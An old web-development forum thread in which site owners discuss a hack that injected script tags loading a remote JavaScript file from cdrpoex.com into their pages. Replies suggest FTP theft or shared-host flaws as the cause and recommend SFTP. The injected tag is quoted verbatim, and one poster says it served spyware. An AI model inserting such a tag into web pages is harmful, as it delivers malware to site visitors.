www.cdrpoex.com/fgg.js site hack

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Hi All

Has anybody else been caught out by a site/ftp hack that puts the following
(or similar) next to the </BODY> in all of your root pages:

<script src=http://www.cdrpoex.com/fgg.js </script><script
src=http://www.cdrpoex.com/fgg.js </script><script
src=http://www.cdrpoex.com/fgg.js </script>

Have they done this purely by getting the FTP password or is there another
way in?

Only I have our FTP password so I'm thinking that it is down to our ISP
rather than our band of 3.


Re: www.cdrpoex.com/fgg.js site hack

On Sat, 26 Jul 2008 16:16:58 +0100, Laphan put finger to keyboard and

Quoted text here. Click to load it

FTP is horribly insecure, so that's the most likely route in. If
you're using a shared webhost, the other possibility is some form of
exploit run on the server that allows users to access and modify other
users' content.

Obviously, you should change your FTP password immediately (I assume
you've already done that), but if at all possible you should stop
using FTP and switch to SFTP instead. If your host doesn't support
that, then strongly consider moving - if they're lax enough on
security to not support SFTP, then it's quite likely that they're lax
in other areas which could create other vulnerabilities.


Re: www.cdrpoex.com/fgg.js site hack

 > FTP is horribly insecure,

But extremely secure compared to some PHP code out there in the wild...

Yet I strongly suggest to stop using FTP and switch to SFTP. But don't
assume that FTP was the way they got in (yet).

John Bokma                                      http://johnbokma.com/

AISE/AWW/SEO/web development forum:       http://seo-expert-wiki.com /

Re: www.cdrpoex.com/fgg.js site hack

Quoted text here. Click to load it

The only time I've ever had a site hacked (happened twice) it was on a
shared host and was down to a problem with the hosting company (which I
think Mark's reply aluded to). I would be inclined to notify your hosting
company and ask them for an explanation because the fault/breach may be at
their end.
Brian Cryer

Re: www.cdrpoex.com/fgg.js site hack

Quoted text here. Click to load it

Yes, I have had multiple sites affected by this. It is not SQL
injection because one of my sites is classic asp with no database. The
host suspects that because I was using the dictionary object that the
bot or whatever it is impersonated the frontpage server extensions to
access all of the files in the directory and insert this garbage,
which, btw, I picked up some nasty ad/spyware and viruses from these
scripts. I am so tired of this. For every step forward there is some
parasite out there making life difficult and I would love to sue them
for the dozens of hours I have spent cleaning up about 15 different
sites on different servers.

Site Timeline